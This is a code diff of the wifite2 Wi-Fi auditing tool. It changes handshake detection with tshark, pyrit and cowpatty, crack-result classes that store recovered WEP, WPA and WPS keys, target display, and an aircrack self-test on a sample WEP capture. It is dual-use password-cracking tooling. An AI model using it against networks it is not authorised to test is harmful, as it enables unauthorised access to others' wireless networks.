self.bssid = match.group(1).replace('-', ':')
|
self.bssid = match.group(1).replace('-', ':')
|
||||||
@@ -37,8 +33,7 @@ class Handshake(object):
|
|||||||
pairs = self.pyrit_handshakes() # Find bssid/essid pairs that have handshakes in Pyrit
|
pairs = self.pyrit_handshakes() # Find bssid/essid pairs that have handshakes in Pyrit
|
||||||
|
|
||||||
if len(pairs) == 0 and not self.bssid and not self.essid:
|
if len(pairs) == 0 and not self.bssid and not self.essid:
|
||||||
# Tshark and Pyrit failed us, nothing else we can do.
|
raise Exception("Cannot find BSSID or ESSID in cap file") # Tshark and Pyrit failed us, nothing else we can do.
|
||||||
raise Exception('Cannot find BSSID or ESSID in cap file')
|
|
||||||
|
|
||||||
if not self.essid and not self.bssid:
|
if not self.essid and not self.bssid:
|
||||||
# We do not know the bssid nor the essid
|
# We do not know the bssid nor the essid
|
||||||
@@ -65,7 +60,6 @@ class Handshake(object):
|
|||||||
self.essid = essid
|
self.essid = essid
|
||||||
break
|
break
|
||||||
|
|
||||||
|
|
||||||
def has_handshake(self):
|
def has_handshake(self):
|
||||||
if not self.bssid or not self.essid:
|
if not self.bssid or not self.essid:
|
||||||
self.divine_bssid_and_essid()
|
self.divine_bssid_and_essid()
|
||||||
@@ -81,26 +75,27 @@ class Handshake(object):
|
|||||||
|
|
||||||
|
|
||||||
def tshark_handshakes(self):
|
def tshark_handshakes(self):
|
||||||
'''Returns list[tuple] of BSSID & ESSID pairs (ESSIDs are always `None`).'''
|
''' Returns True if tshark identifies a handshake, False otherwise '''
|
||||||
tshark_bssids = Tshark.bssids_with_handshakes(self.capfile, bssid=self.bssid)
|
tshark_bssids = Tshark.bssids_with_handshakes(self.capfile, bssid=self.bssid)
|
||||||
return [(bssid, None) for bssid in tshark_bssids]
|
return [(bssid, None) for bssid in tshark_bssids]
|
||||||
|
|
||||||
|
|
||||||
def cowpatty_handshakes(self):
|
def cowpatty_command(self):
|
||||||
'''Returns list[tuple] of BSSID & ESSID pairs (BSSIDs are always `None`).'''
|
return [
|
||||||
if not Process.exists('cowpatty'):
|
|
||||||
return []
|
|
||||||
if not self.essid:
|
|
||||||
return [] # We need a essid for cowpatty :(
|
|
||||||
|
|
||||||
command = [
|
|
||||||
'cowpatty',
|
'cowpatty',
|
||||||
'-r', self.capfile,
|
'-r', self.capfile,
|
||||||
'-s', self.essid,
|
'-s', self.essid,
|
||||||
'-c' # Check for handshake
|
'-c' # Check for handshake
|
||||||
]
|
]
|
||||||
|
|
||||||
proc = Process(command, devnull=False)
|
def cowpatty_handshakes(self):
|
||||||
|
''' Returns True if cowpatty identifies a handshake, False otherwise '''
|
||||||
|
if not Process.exists('cowpatty'):
|
||||||
|
return []
|
||||||
|
if not self.essid:
|
||||||
|
return [] # We need a essid for cowpatty :(
|
||||||
|
|
||||||
|
proc = Process(self.cowpatty_command(), devnull=False)
|
||||||
for line in proc.stdout().split('\n'):
|
for line in proc.stdout().split('\n'):
|
||||||
if 'Collected all necessary data to mount crack against WPA' in line:
|
if 'Collected all necessary data to mount crack against WPA' in line:
|
||||||
return [(None, self.essid)]
|
return [(None, self.essid)]
|
||||||
@@ -108,9 +103,8 @@ class Handshake(object):
|
|||||||
|
|
||||||
|
|
||||||
def pyrit_handshakes(self):
|
def pyrit_handshakes(self):
|
||||||
'''Returns list[tuple] of BSSID & ESSID pairs.'''
|
''' Returns list of BSSID,ESSID tuples if pyrit identifies a handshake'''
|
||||||
return Pyrit.bssid_essid_with_handshakes(
|
return Pyrit.bssid_essid_with_handshakes(self.capfile, bssid=self.bssid, essid=self.essid)
|
||||||
self.capfile, bssid=self.bssid, essid=self.essid)
|
|
||||||
|
|
||||||
|
|
||||||
def aircrack_handshakes(self):
|
def aircrack_handshakes(self):
|
||||||
@@ -131,15 +125,9 @@ class Handshake(object):
|
|||||||
'''Prints analysis of handshake capfile'''
|
'''Prints analysis of handshake capfile'''
|
||||||
self.divine_bssid_and_essid()
|
self.divine_bssid_and_essid()
|
||||||
|
|
||||||
if Tshark.exists():
|
|
||||||
Handshake.print_pairs(self.tshark_handshakes(), self.capfile, 'tshark')
|
Handshake.print_pairs(self.tshark_handshakes(), self.capfile, 'tshark')
|
||||||
|
|
||||||
if Pyrit.exists():
|
|
||||||
Handshake.print_pairs(self.pyrit_handshakes(), self.capfile, 'pyrit')
|
Handshake.print_pairs(self.pyrit_handshakes(), self.capfile, 'pyrit')
|
||||||
|
|
||||||
if Process.exists('cowpatty'):
|
|
||||||
Handshake.print_pairs(self.cowpatty_handshakes(), self.capfile, 'cowpatty')
|
Handshake.print_pairs(self.cowpatty_handshakes(), self.capfile, 'cowpatty')
|
||||||
|
|
||||||
Handshake.print_pairs(self.aircrack_handshakes(), self.capfile, 'aircrack')
|
Handshake.print_pairs(self.aircrack_handshakes(), self.capfile, 'aircrack')
|
||||||
|
|
||||||
|
|
||||||
@@ -183,7 +171,7 @@ class Handshake(object):
|
|||||||
tool_str = '{C}%s{W}: ' % tool.rjust(8)
|
tool_str = '{C}%s{W}: ' % tool.rjust(8)
|
||||||
|
|
||||||
if len(pairs) == 0:
|
if len(pairs) == 0:
|
||||||
Color.pl('{!} %s.cap file {R}does not{O} contain a valid handshake{W}' % (tool_str))
|
Color.pl("{!} %s.cap file {R}does not{O} contain a valid handshake{W}" % (tool_str))
|
||||||
return
|
return
|
||||||
|
|
||||||
for (bssid, essid) in pairs:
|
for (bssid, essid) in pairs:
|
||||||
@@ -196,51 +184,24 @@ class Handshake(object):
|
|||||||
Color.pl('%s ({G}%s{W})' % (out_str, essid))
|
Color.pl('%s ({G}%s{W})' % (out_str, essid))
|
||||||
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def check():
|
|
||||||
''' Analyzes .cap file(s) for handshake '''
|
|
||||||
from ..config import Configuration
|
|
||||||
if Configuration.check_handshake == '<all>':
|
|
||||||
Color.pl('{+} checking all handshakes in {G}"./hs"{W} directory\n')
|
|
||||||
try:
|
|
||||||
capfiles = [os.path.join('hs', x) for x in os.listdir('hs') if x.endswith('.cap')]
|
|
||||||
except OSError as e:
|
|
||||||
capfiles = []
|
|
||||||
if len(capfiles) == 0:
|
|
||||||
Color.pl('{!} {R}no .cap files found in {O}"./hs"{W}\n')
|
|
||||||
else:
|
|
||||||
capfiles = [Configuration.check_handshake]
|
|
||||||
|
|
||||||
for capfile in capfiles:
|
|
||||||
Color.pl('{+} checking for handshake in .cap file {C}%s{W}' % capfile)
|
|
||||||
if not os.path.exists(capfile):
|
|
||||||
Color.pl('{!} {O}.cap file {C}%s{O} not found{W}' % capfile)
|
|
||||||
return
|
|
||||||
hs = Handshake(capfile, bssid=Configuration.target_bssid, essid=Configuration.target_essid)
|
|
||||||
hs.analyze()
|
|
||||||
Color.pl('')
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
print('With BSSID & ESSID specified:')
|
print('With BSSID & ESSID specified:')
|
||||||
hs = Handshake('./tests/files/handshake_has_1234.cap', bssid='18:d6:c7:6d:6b:18', essid='YZWifi')
|
hs = Handshake('./tests/files/handshake_has_1234.cap', bssid='18:d6:c7:6d:6b:18', essid='YZWifi')
|
||||||
hs.analyze()
|
hs.analyze()
|
||||||
print('has_hanshake() =', hs.has_handshake())
|
print("has_hanshake() =", hs.has_handshake())
|
||||||
|
|
||||||
print('\nWith BSSID, but no ESSID specified:')
|
print('\nWith BSSID, but no ESSID specified:')
|
||||||
hs = Handshake('./tests/files/handshake_has_1234.cap', bssid='18:d6:c7:6d:6b:18')
|
hs = Handshake('./tests/files/handshake_has_1234.cap', bssid='18:d6:c7:6d:6b:18')
|
||||||
hs.analyze()
|
hs.analyze()
|
||||||
print('has_hanshake() =', hs.has_handshake())
|
print("has_hanshake() =", hs.has_handshake())
|
||||||
|
|
||||||
print('\nWith ESSID, but no BSSID specified:')
|
print('\nWith ESSID, but no BSSID specified:')
|
||||||
hs = Handshake('./tests/files/handshake_has_1234.cap', essid='YZWifi')
|
hs = Handshake('./tests/files/handshake_has_1234.cap', essid='YZWifi')
|
||||||
hs.analyze()
|
hs.analyze()
|
||||||
print('has_hanshake() =', hs.has_handshake())
|
print("has_hanshake() =", hs.has_handshake())
|
||||||
|
|
||||||
print('\nWith neither BSSID nor ESSID specified:')
|
print('\nWith neither BSSID nor ESSID specified:')
|
||||||
hs = Handshake('./tests/files/handshake_has_1234.cap')
|
hs = Handshake('./tests/files/handshake_has_1234.cap')
|
||||||
try:
|
|
||||||
hs.analyze()
|
hs.analyze()
|
||||||
print('has_hanshake() =', hs.has_handshake())
|
print("has_hanshake() =", hs.has_handshake())
|
||||||
except Exception as e:
|
|
||||||
Color.pl('{O}Error during Handshake.analyze(): {R}%s{W}' % e)
|
|
||||||
|
|||||||
@@ -1,60 +0,0 @@
|
|||||||
#!/usr/bin/env python
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from ..util.color import Color
|
|
||||||
from .result import CrackResult
|
|
||||||
|
|
||||||
class CrackResultPMKID(CrackResult):
|
|
||||||
def __init__(self, bssid, essid, pmkid_file, key):
|
|
||||||
self.result_type = 'PMKID'
|
|
||||||
self.bssid = bssid
|
|
||||||
self.essid = essid
|
|
||||||
self.pmkid_file = pmkid_file
|
|
||||||
self.key = key
|
|
||||||
super(CrackResultPMKID, self).__init__()
|
|
||||||
|
|
||||||
def dump(self):
|
|
||||||
if self.essid:
|
|
||||||
Color.pl('{+} %s: {C}%s{W}' %
|
|
||||||
('Access Point Name'.rjust(19), self.essid))
|
|
||||||
if self.bssid:
|
|
||||||
Color.pl('{+} %s: {C}%s{W}' %
|
|
||||||
('Access Point BSSID'.rjust(19), self.bssid))
|
|
||||||
Color.pl('{+} %s: {C}%s{W}' %
|
|
||||||
('Encryption'.rjust(19), self.result_type))
|
|
||||||
if self.pmkid_file:
|
|
||||||
Color.pl('{+} %s: {C}%s{W}' %
|
|
||||||
('PMKID File'.rjust(19), self.pmkid_file))
|
|
||||||
if self.key:
|
|
||||||
Color.pl('{+} %s: {G}%s{W}' % ('PSK (password)'.rjust(19), self.key))
|
|
||||||
else:
|
|
||||||
Color.pl('{!} %s {O}key unknown{W}' % ''.rjust(19))
|
|
||||||
|
|
||||||
def print_single_line(self, longest_essid):
|
|
||||||
self.print_single_line_prefix(longest_essid)
|
|
||||||
Color.p('{G}%s{W}' % 'PMKID'.ljust(5))
|
|
||||||
Color.p(' ')
|
|
||||||
Color.p('Key: {G}%s{W}' % self.key)
|
|
||||||
Color.pl('')
|
|
||||||
|
|
||||||
def to_dict(self):
|
|
||||||
return {
|
|
||||||
'type' : self.result_type,
|
|
||||||
'date' : self.date,
|
|
||||||
'essid' : self.essid,
|
|
||||||
'bssid' : self.bssid,
|
|
||||||
'key' : self.key,
|
|
||||||
'pmkid_file' : self.pmkid_file
|
|
||||||
}
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
|
||||||
w = CrackResultPMKID('AA:BB:CC:DD:EE:FF', 'Test Router', 'hs/pmkid_blah-123213.16800', 'abcd1234')
|
|
||||||
w.dump()
|
|
||||||
|
|
||||||
w = CrackResultPMKID('AA:BB:CC:DD:EE:FF', 'Test Router', 'hs/pmkid_blah-123213.16800', 'Key')
|
|
||||||
print('\n')
|
|
||||||
w.dump()
|
|
||||||
w.save()
|
|
||||||
print(w.__dict__['bssid'])
|
|
||||||
|
|
||||||
|
|
||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from ..util.color import Color
|
from ..util.color import Color
|
||||||
@@ -11,30 +11,16 @@ class CrackResult(object):
|
|||||||
''' Abstract class containing results from a crack session '''
|
''' Abstract class containing results from a crack session '''
|
||||||
|
|
||||||
# File to save cracks to, in PWD
|
# File to save cracks to, in PWD
|
||||||
cracked_file = 'cracked.txt'
|
cracked_file = "cracked.txt"
|
||||||
|
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
self.date = int(time.time())
|
self.date = int(time.time())
|
||||||
self.readable_date = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(self.date))
|
|
||||||
|
|
||||||
def dump(self):
|
def dump(self):
|
||||||
raise Exception('Unimplemented method: dump()')
|
raise Exception("Unimplemented method: dump()")
|
||||||
|
|
||||||
def to_dict(self):
|
def to_dict(self):
|
||||||
raise Exception('Unimplemented method: to_dict()')
|
raise Exception("Unimplemented method: to_dict()")
|
||||||
|
|
||||||
def print_single_line(self, longest_essid):
|
|
||||||
raise Exception('Unimplemented method: print_single_line()')
|
|
||||||
|
|
||||||
def print_single_line_prefix(self, longest_essid):
|
|
||||||
essid = self.essid if self.essid else 'N/A'
|
|
||||||
Color.p('{W} ')
|
|
||||||
Color.p('{C}%s{W}' % essid.ljust(longest_essid))
|
|
||||||
Color.p(' ')
|
|
||||||
Color.p('{GR}%s{W}' % self.bssid.ljust(17))
|
|
||||||
Color.p(' ')
|
|
||||||
Color.p('{D}%s{W}' % self.readable_date.ljust(19))
|
|
||||||
Color.p(' ')
|
|
||||||
|
|
||||||
def save(self):
|
def save(self):
|
||||||
''' Adds this crack result to the cracked file and saves it. '''
|
''' Adds this crack result to the cracked file and saves it. '''
|
||||||
@@ -53,51 +39,10 @@ class CrackResult(object):
|
|||||||
Color.pl('{+} saved crack result to {C}%s{W} ({G}%d total{W})'
|
Color.pl('{+} saved crack result to {C}%s{W} ({G}%d total{W})'
|
||||||
% (name, len(json)))
|
% (name, len(json)))
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def display(cls):
|
|
||||||
''' Show cracked targets from cracked.txt '''
|
|
||||||
name = cls.cracked_file
|
|
||||||
if not os.path.exists(name):
|
|
||||||
Color.pl('{!} {O}file {C}%s{O} not found{W}' % name)
|
|
||||||
return
|
|
||||||
|
|
||||||
with open(name, 'r') as fid:
|
|
||||||
cracked_targets = loads(fid.read())
|
|
||||||
|
|
||||||
if len(cracked_targets) == 0:
|
|
||||||
Color.pl('{!} {R}no results found in {O}%s{W}' % name)
|
|
||||||
return
|
|
||||||
|
|
||||||
Color.pl('\n{+} Displaying {G}%d{W} cracked target(s) from {C}%s{W}\n' % (
|
|
||||||
len(cracked_targets), name))
|
|
||||||
|
|
||||||
results = sorted([cls.load(item) for item in cracked_targets], key=lambda x: x.date, reverse=True)
|
|
||||||
longest_essid = max([len(result.essid or 'ESSID') for result in results])
|
|
||||||
|
|
||||||
# Header
|
|
||||||
Color.p('{D} ')
|
|
||||||
Color.p('ESSID'.ljust(longest_essid))
|
|
||||||
Color.p(' ')
|
|
||||||
Color.p('BSSID'.ljust(17))
|
|
||||||
Color.p(' ')
|
|
||||||
Color.p('DATE'.ljust(19))
|
|
||||||
Color.p(' ')
|
|
||||||
Color.p('TYPE'.ljust(5))
|
|
||||||
Color.p(' ')
|
|
||||||
Color.p('KEY')
|
|
||||||
Color.pl('{D}')
|
|
||||||
Color.p(' ' + '-' * (longest_essid + 17 + 19 + 5 + 11 + 12))
|
|
||||||
Color.pl('{W}')
|
|
||||||
# Results
|
|
||||||
for result in results:
|
|
||||||
result.print_single_line(longest_essid)
|
|
||||||
Color.pl('')
|
|
||||||
|
|
||||||
|
|
||||||
@classmethod
|
@classmethod
|
||||||
def load_all(cls):
|
def load_all(cls):
|
||||||
if not os.path.exists(cls.cracked_file): return []
|
if not os.path.exists(cls.cracked_file): return []
|
||||||
with open(cls.cracked_file, 'r') as json_file:
|
with open(cls.cracked_file, "r") as json_file:
|
||||||
json = loads(json_file.read())
|
json = loads(json_file.read())
|
||||||
return json
|
return json
|
||||||
|
|
||||||
@@ -123,15 +68,7 @@ class CrackResult(object):
|
|||||||
json['essid'],
|
json['essid'],
|
||||||
json['pin'],
|
json['pin'],
|
||||||
json['psk'])
|
json['psk'])
|
||||||
|
|
||||||
elif json['type'] == 'PMKID':
|
|
||||||
from .pmkid_result import CrackResultPMKID
|
|
||||||
result = CrackResultPMKID(json['bssid'],
|
|
||||||
json['essid'],
|
|
||||||
json['pmkid_file'],
|
|
||||||
json['key'])
|
|
||||||
result.date = json['date']
|
result.date = json['date']
|
||||||
result.readable_date = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(result.date))
|
|
||||||
return result
|
return result
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from ..util.color import Color
|
from ..util.color import Color
|
||||||
@@ -7,7 +7,7 @@ import re
|
|||||||
|
|
||||||
class Target(object):
|
class Target(object):
|
||||||
'''
|
'''
|
||||||
Holds details for a 'Target' aka Access Point (e.g. router).
|
Holds details for a "Target" aka Access Point (e.g. router).
|
||||||
'''
|
'''
|
||||||
|
|
||||||
def __init__(self, fields):
|
def __init__(self, fields):
|
||||||
@@ -56,7 +56,7 @@ class Target(object):
|
|||||||
if self.essid == '\\x00' * self.essid_len or \
|
if self.essid == '\\x00' * self.essid_len or \
|
||||||
self.essid == 'x00' * self.essid_len or \
|
self.essid == 'x00' * self.essid_len or \
|
||||||
self.essid.strip() == '':
|
self.essid.strip() == '':
|
||||||
# Don't display '\x00...' for hidden ESSIDs
|
# Don't display "\x00..." for hidden ESSIDs
|
||||||
self.essid = None # '(%s)' % self.bssid
|
self.essid = None # '(%s)' % self.bssid
|
||||||
self.essid_known = False
|
self.essid_known = False
|
||||||
|
|
||||||
@@ -70,26 +70,26 @@ class Target(object):
|
|||||||
|
|
||||||
def validate(self):
|
def validate(self):
|
||||||
''' Checks that the target is valid. '''
|
''' Checks that the target is valid. '''
|
||||||
if self.channel == '-1':
|
if self.channel == "-1":
|
||||||
raise Exception('Ignoring target with Negative-One (-1) channel')
|
raise Exception("Ignoring target with Negative-One (-1) channel")
|
||||||
|
|
||||||
# Filter broadcast/multicast BSSIDs, see https://github.com/derv82/wifite2/issues/32
|
# Filter broadcast/multicast BSSIDs, see https://github.com/derv82/wifite2/issues/32
|
||||||
bssid_broadcast = re.compile(r'^(ff:ff:ff:ff:ff:ff|00:00:00:00:00:00)$', re.IGNORECASE)
|
bssid_broadcast = re.compile(r"^(ff:ff:ff:ff:ff:ff|00:00:00:00:00:00)$", re.IGNORECASE)
|
||||||
if bssid_broadcast.match(self.bssid):
|
if bssid_broadcast.match(self.bssid):
|
||||||
raise Exception('Ignoring target with Broadcast BSSID (%s)' % self.bssid)
|
raise Exception("Ignoring target with Broadcast BSSID (%s)" % self.bssid)
|
||||||
|
|
||||||
bssid_multicast = re.compile(r'^(01:00:5e|01:80:c2|33:33)', re.IGNORECASE)
|
bssid_multicast = re.compile(r"^(01:00:5e|01:80:c2|33:33)", re.IGNORECASE)
|
||||||
if bssid_multicast.match(self.bssid):
|
if bssid_multicast.match(self.bssid):
|
||||||
raise Exception('Ignoring target with Multicast BSSID (%s)' % self.bssid)
|
raise Exception("Ignoring target with Multicast BSSID (%s)" % self.bssid)
|
||||||
|
|
||||||
def to_str(self, show_bssid=False):
|
def to_str(self, show_bssid=False):
|
||||||
'''
|
'''
|
||||||
*Colored* string representation of this Target.
|
*Colored* string representation of this Target.
|
||||||
Specifically formatted for the 'scanning' table view.
|
Specifically formatted for the "scanning" table view.
|
||||||
'''
|
'''
|
||||||
|
|
||||||
max_essid_len = 24
|
max_essid_len = 24
|
||||||
essid = self.essid if self.essid_known else '(%s)' % self.bssid
|
essid = self.essid if self.essid_known else "(%s)" % self.bssid
|
||||||
# Trim ESSID (router name) if needed
|
# Trim ESSID (router name) if needed
|
||||||
if len(essid) > max_essid_len:
|
if len(essid) > max_essid_len:
|
||||||
essid = essid[0:max_essid_len-3] + '...'
|
essid = essid[0:max_essid_len-3] + '...'
|
||||||
@@ -98,30 +98,30 @@ class Target(object):
|
|||||||
|
|
||||||
if self.essid_known:
|
if self.essid_known:
|
||||||
# Known ESSID
|
# Known ESSID
|
||||||
essid = Color.s('{C}%s' % essid)
|
essid = Color.s("{C}%s" % essid)
|
||||||
else:
|
else:
|
||||||
# Unknown ESSID
|
# Unknown ESSID
|
||||||
essid = Color.s('{O}%s' % essid)
|
essid = Color.s("{O}%s" % essid)
|
||||||
|
|
||||||
# Add a '*' if we decloaked the ESSID
|
# Add a "*" if we decloaked the ESSID
|
||||||
decloaked_char = '*' if self.decloaked else ' '
|
decloaked_char = '*' if self.decloaked else ' '
|
||||||
essid += Color.s('{P}%s' % decloaked_char)
|
essid += Color.s("{P}%s" % decloaked_char)
|
||||||
|
|
||||||
if show_bssid:
|
if show_bssid:
|
||||||
bssid = Color.s('{O}%s ' % self.bssid)
|
bssid = Color.s('{O}%s ' % self.bssid)
|
||||||
else:
|
else:
|
||||||
bssid = ''
|
bssid = ''
|
||||||
|
|
||||||
channel_color = '{G}'
|
channel_color = "{G}"
|
||||||
if int(self.channel) > 14:
|
if int(self.channel) > 14:
|
||||||
channel_color = '{C}'
|
channel_color = "{C}"
|
||||||
channel = Color.s('%s%s' % (channel_color, str(self.channel).rjust(3)))
|
channel = Color.s("%s%s" % (channel_color, str(self.channel).rjust(3)))
|
||||||
|
|
||||||
encryption = self.encryption.rjust(4)
|
encryption = self.encryption.rjust(4)
|
||||||
if 'WEP' in encryption:
|
if 'WEP' in encryption:
|
||||||
encryption = Color.s('{G}%s' % encryption)
|
encryption = Color.s("{G}%s" % encryption)
|
||||||
elif 'WPA' in encryption:
|
elif 'WPA' in encryption:
|
||||||
encryption = Color.s('{O}%s' % encryption)
|
encryption = Color.s("{O}%s" % encryption)
|
||||||
|
|
||||||
power = '%sdb' % str(self.power).rjust(3)
|
power = '%sdb' % str(self.power).rjust(3)
|
||||||
if self.power > 50:
|
if self.power > 50:
|
||||||
@@ -146,14 +146,14 @@ class Target(object):
|
|||||||
|
|
||||||
result = '%s %s%s %s %s %s %s' % (
|
result = '%s %s%s %s %s %s %s' % (
|
||||||
essid, bssid, channel, encryption, power, wps, clients)
|
essid, bssid, channel, encryption, power, wps, clients)
|
||||||
result += Color.s('{W}')
|
result += Color.s("{W}")
|
||||||
return result
|
return result
|
||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
fields = 'AA:BB:CC:DD:EE:FF,2015-05-27 19:28:44,2015-05-27 19:28:46,1,54,WPA2,CCMP TKIP,PSK,-58,2,0,0.0.0.0,9,HOME-ABCD,'.split(',')
|
fields = 'AA:BB:CC:DD:EE:FF,2015-05-27 19:28:44,2015-05-27 19:28:46,1,54,WPA2,CCMP TKIP,PSK,-58,2,0,0.0.0.0,9,HOME-ABCD,'.split(',')
|
||||||
t = Target(fields)
|
t = Target(fields)
|
||||||
t.clients.append('asdf')
|
t.clients.append("asdf")
|
||||||
t.clients.append('asdf')
|
t.clients.append("asdf")
|
||||||
print(t.to_str())
|
print(t.to_str())
|
||||||
|
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from ..util.color import Color
|
from ..util.color import Color
|
||||||
@@ -24,15 +24,6 @@ class CrackResultWEP(CrackResult):
|
|||||||
if self.ascii_key:
|
if self.ascii_key:
|
||||||
Color.pl('{+} Ascii Key: {G}%s{W}' % self.ascii_key)
|
Color.pl('{+} Ascii Key: {G}%s{W}' % self.ascii_key)
|
||||||
|
|
||||||
def print_single_line(self, longest_essid):
|
|
||||||
self.print_single_line_prefix(longest_essid)
|
|
||||||
Color.p('{G}%s{W}' % 'WEP'.ljust(5))
|
|
||||||
Color.p(' ')
|
|
||||||
Color.p('Hex: {G}%s{W}' % self.hex_key.replace(':', ''))
|
|
||||||
if self.ascii_key:
|
|
||||||
Color.p(' (ASCII: {G}%s{W})' % self.ascii_key)
|
|
||||||
Color.pl('')
|
|
||||||
|
|
||||||
def to_dict(self):
|
def to_dict(self):
|
||||||
return {
|
return {
|
||||||
'type' : self.result_type,
|
'type' : self.result_type,
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from ..util.color import Color
|
from ..util.color import Color
|
||||||
@@ -30,13 +30,6 @@ class CrackResultWPA(CrackResult):
|
|||||||
else:
|
else:
|
||||||
Color.pl('{!} %s {O}key unknown{W}' % ''.rjust(19))
|
Color.pl('{!} %s {O}key unknown{W}' % ''.rjust(19))
|
||||||
|
|
||||||
def print_single_line(self, longest_essid):
|
|
||||||
self.print_single_line_prefix(longest_essid)
|
|
||||||
Color.p('{G}%s{W}' % 'WPA'.ljust(5))
|
|
||||||
Color.p(' ')
|
|
||||||
Color.p('Key: {G}%s{W}' % self.key)
|
|
||||||
Color.pl('')
|
|
||||||
|
|
||||||
def to_dict(self):
|
def to_dict(self):
|
||||||
return {
|
return {
|
||||||
'type' : self.result_type,
|
'type' : self.result_type,
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from ..util.color import Color
|
from ..util.color import Color
|
||||||
@@ -27,15 +27,6 @@ class CrackResultWPS(CrackResult):
|
|||||||
Color.pl('{+} %s: {G}%s{W}' % ( 'WPS PIN'.rjust(12), self.pin))
|
Color.pl('{+} %s: {G}%s{W}' % ( 'WPS PIN'.rjust(12), self.pin))
|
||||||
Color.pl('{+} %s: {G}%s{W}' % ('PSK/Password'.rjust(12), psk))
|
Color.pl('{+} %s: {G}%s{W}' % ('PSK/Password'.rjust(12), psk))
|
||||||
|
|
||||||
def print_single_line(self, longest_essid):
|
|
||||||
self.print_single_line_prefix(longest_essid)
|
|
||||||
Color.p('{G}%s{W}' % 'WPS'.ljust(5))
|
|
||||||
Color.p(' ')
|
|
||||||
if self.psk:
|
|
||||||
Color.p('Key: {G}%s{W} ' % self.psk)
|
|
||||||
Color.p('PIN: {G}%s{W}' % self.pin)
|
|
||||||
Color.pl('')
|
|
||||||
|
|
||||||
def to_dict(self):
|
def to_dict(self):
|
||||||
return {
|
return {
|
||||||
'type' : self.result_type,
|
'type' : self.result_type,
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from .dependency import Dependency
|
from .dependency import Dependency
|
||||||
@@ -91,17 +91,17 @@ if __name__ == '__main__':
|
|||||||
Configuration.initialize(False)
|
Configuration.initialize(False)
|
||||||
|
|
||||||
ivs_file = 'tests/files/wep-crackable.ivs'
|
ivs_file = 'tests/files/wep-crackable.ivs'
|
||||||
print('Running aircrack on %s ...' % ivs_file)
|
print("Running aircrack on %s ..." % ivs_file)
|
||||||
|
|
||||||
aircrack = Aircrack(ivs_file)
|
aircrack = Aircrack(ivs_file)
|
||||||
while aircrack.is_running():
|
while aircrack.is_running():
|
||||||
sleep(1)
|
sleep(1)
|
||||||
|
|
||||||
assert aircrack.is_cracked(), 'Aircrack should have cracked %s' % ivs_file
|
assert aircrack.is_cracked(), "Aircrack should have cracked %s" % ivs_file
|
||||||
print('aircrack process completed.')
|
print("aircrack process completed.")
|
||||||
|
|
||||||
(hexkey, asciikey) = aircrack.get_key_hex_ascii()
|
(hexkey, asciikey) = aircrack.get_key_hex_ascii()
|
||||||
print('aircrack found HEX key: (%s) and ASCII key: (%s)' % (hexkey, asciikey))
|
print("aircrack found HEX key: (%s) and ASCII key: (%s)" % (hexkey, asciikey))
|
||||||
assert hexkey == '75:6E:63:6C:65', 'hexkey was "%s", expected "75:6E:63:6C:65"' % hexkey
|
assert hexkey == '75:6E:63:6C:65', 'hexkey was "%s", expected "75:6E:63:6C:65"' % hexkey
|
||||||
assert asciikey == 'uncle', 'asciikey was "%s", expected "uncle"' % asciikey
|
assert asciikey == 'uncle', 'asciikey was "%s", expected "uncle"' % asciikey
|
||||||
|
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from .dependency import Dependency
|
from .dependency import Dependency
|
||||||
@@ -36,7 +36,7 @@ class WEPAttackType(object):
|
|||||||
self.name = name
|
self.name = name
|
||||||
self.value = value
|
self.value = value
|
||||||
return
|
return
|
||||||
raise Exception('Attack number %d not found' % var)
|
raise Exception("Attack number %d not found" % var)
|
||||||
elif type(var) is str:
|
elif type(var) is str:
|
||||||
for (name,value) in WEPAttackType.__dict__.items():
|
for (name,value) in WEPAttackType.__dict__.items():
|
||||||
if type(value) is int:
|
if type(value) is int:
|
||||||
@@ -44,12 +44,12 @@ class WEPAttackType(object):
|
|||||||
self.name = name
|
self.name = name
|
||||||
self.value = value
|
self.value = value
|
||||||
return
|
return
|
||||||
raise Exception('Attack name %s not found' % var)
|
raise Exception("Attack name %s not found" % var)
|
||||||
elif type(var) == WEPAttackType:
|
elif type(var) == WEPAttackType:
|
||||||
self.name = var.name
|
self.name = var.name
|
||||||
self.value = var.value
|
self.value = var.value
|
||||||
else:
|
else:
|
||||||
raise Exception('Attack type not supported')
|
raise Exception("Attack type not supported")
|
||||||
|
|
||||||
def __str__(self):
|
def __str__(self):
|
||||||
return self.name
|
return self.name
|
||||||
